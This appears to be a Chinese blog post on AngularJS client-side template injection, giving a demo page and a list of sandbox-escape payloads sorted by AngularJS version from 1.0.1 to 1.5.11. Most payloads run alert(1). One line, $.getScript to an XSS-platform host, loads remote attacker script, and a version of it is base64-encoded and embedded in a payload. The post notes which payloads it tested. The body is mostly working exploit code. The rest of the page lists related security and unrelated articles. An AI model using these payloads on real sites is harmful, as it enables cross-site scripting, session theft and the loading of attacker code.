<html>

<head>

<meta charset="utf-8">

<script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>

</head>

<body>

<div ng-app>{{ 7+7 }}</div>

</body>

</html>
http://www.runoob.com/try/try.php?filename=try_ng_intro
Bypass Payload



下面是一些 AngularJS 绕过的 Payload:

1.0.1 - 1.1.5

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0

{{!ready && (ready = true) && (

!call

? $$watchers[0].get(toString.constructor.prototype)

: (a = apply) &&

(apply = constructor) &&

(valueOf = call) &&

(''+''.toString(

'F = Function.prototype;' +

'F.apply = F.a;' +

'delete F.a;' +

'delete F.valueOf;' +

'alert(1);'

))

);}}

1.3.1 - 1.3.2

{{

{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=''.valueOf;

 $eval('x=alert(1)//');

}}

1.3.3 - 1.3.18

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=[].join;

 $eval('x=alert(1)//'); }}

1.3.19

{{

'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;

 $eval('x=alert(1)//');

}}

1.3.20

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
$.getScript('http://xsspt.com/xxxx');

编码之后

eval(atob('JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw=='));

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw


1.5.0 - 1.5.8

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}    ---->没有测试成功

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(42),a')}}');}}   此条在liveoverflow.com测试成功

1.5.9 - 1.5.11

{{

 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;

 c.$apply=$apply;c.$eval=b;op=$root.$$phase;

 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;

 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;

 B=C(b,c,b);$evalAsync("

 astNode=pop();astNode.type='UnaryExpression';

 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';

 astNode.argument={type:'Identifier',name:'foo'};

");

 m1=B($$asyncQueue.pop().expression,null,$root);

 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;

 $eval('a(b.c)');[].push.apply=a;

}}


												


											
Client-Side Template Injection with AngularJS的更多相关文章
	

    
								
  1. Portswigger web security academy:Server-side template injection(SSTI)
		
    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...
    
		
    2. 
						
  2. markdown反射型xss漏洞复现
		
    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...
    
		
    3. 
						
  3. 先知xss挑战赛学习笔记
		
    xss游戏 游戏地址:http://ec2-13-58-146-2.us-east-2.compute.amazonaws.com/ LEMON参考wp地址 1. 文件上传 源码如下 <?php ...
    
		
    4. 
						
  4. web全套资料 干货满满 各种文章详解
		
    sql注入l MySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名.字段名.库名高级S ...
    
		
    5. 
						
  5. ref:web security最新学习资料收集
		
    ref:https://chybeta.github.io/2017/08/19/Web-Security-Learning/ ref:https://github.com/CHYbeta/Web-S ...
    
		
    6. 
						
  6. Web-Security-Learning
		
    Web Security sql注入 MySql MySQL False 注入及技巧总结 MySQL 注入攻击与防御 sql注入学习总结 SQL注入防御与绕过的几种姿势 MySQL偏门技巧 mysql ...
    
		
    7. 
						
  7. AngularJS 特性—SinglePage、template、Controller
		
    单页Web应用(SinglePage) 顾名思义,只使用一个页面的Web应用程序.单页面应用是指用户通过浏览器加载独立的HTML页面,Ajax加载数据页面无刷新,实现操作各种操作. 模板(templa ...
    
		
    8. 
						
  8. OData Client Code Generator
		
    转发. [Tutorial & Sample] How to use OData Client Code Generator to generate client-side proxy cla ...
    
		
    9. 
						
  9. AngularJS Directive 学习笔记
		
    指令 Directive 指令要点 大漠老师的教学节点 解析最简单的指令 hello: 匹配模式 restrict 解析最简单的指令 hello: template.tempmlateUrl.$tem ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. chome(谷歌浏览器)上传文件崩溃/上传图片崩溃/打开浏览文件未响应 解决方案
			
    测试解决方案:关闭搜狗输入法(我用的是搜狗输入法,若使用其他输入法,此方案也可能适用),再测试是否重现浏览器崩溃问题 可选解决方案:升级搜狗输入法(如果想 卸载输入法 也可以) 前面有段时间chome ...
    
			
    2. 
						
  2. JavaScript -- JSON.parse 函数 和 JSON.stringify 函数
			
    JavaScript -- JSON.parse 函数 和 JSON.stringify 函数 1. JSON.parse 函数: 使用 JSON.parse 可将 JSON 字符串转换成对象. &l ...
    
			
    3. 
						
  3. CentOS7.2重置root密码的处理方法
			
    第一个里程碑 --在启动GRUB菜单中选择编辑选项,按键 "e" 进入编辑; 第二个里程碑 -- 大约在第16行找到 "ro" 将 "ro" ...
    
			
    4. 
						
  4. R语言学习——向量
			
    以下为在RStudio中输入 #为注释符,其后内容程序不执行 > #向量是用于储存数值型.字符型或者逻辑型数据的一维数组.执行组合功能的函数c()可用来创建向量.示例如下: > a< ...
    
			
    5. 
						
  5. WEB框架-Django组件学习-分页器学习
			
    1.分页器基础学习 1.1 补充知识-批量创建 数据库中数据批量创建,不要每创建一个就往数据库中塞一个,会造成撞库,造成大量I/O操作,速速较慢,应该采用一次性创建大量数据,一次性将大量数据塞入到数据 ...
    
			
    6. 
						
  6. ORM杂记
			
    1.反射练习 import sys class Person(object): def __init__(self, name): self.name = name def eat(self, foo ...
    
			
    7. 
						
  7. ORA-01578 data block corrupted 数据文件损坏 与 修复 (多为借鉴 linux)
			
    好吧,先说说造成崩溃的原因: 使用redhat 5.9 Linux 作为数据库服务器, 周五数据库正在使用中,硬关机造成数据库文件部分损坏(周一上班时,应用程序启动不起来,查看日志文件时,发现一个数据 ...
    
			
    8. 
						
  8. Each path can be reduced to a simple path
			
    Recently, I made a small conclusion, but I found it is found and well-founded in some textbook. So I ...
    
			
    9. 
						
  9. C语言之四舍五入
			
    在C语言中,如果进行强制类型转换,它会将所需要取的位数直接提取出来,而其他位数的数字会被直接删除,不会对提取出来的位数有任何影响 所以如果我们需要提高精度,对所取的数进行四舍五入,需要给所需去的数的最 ...
    
			
    10. 
						
  10. ReentrantLock重入锁详解
			
    1.定义 重入锁:能够支持一个线程对资源的重复加锁,也就是当一个线程获取到锁后,再次获取该锁时而不会被阻塞. 2.可重入锁的应用场景 2.1 如果已经加锁,则不再重复加锁,比如:交互界面点击后响应时间 ...
    
			
    11.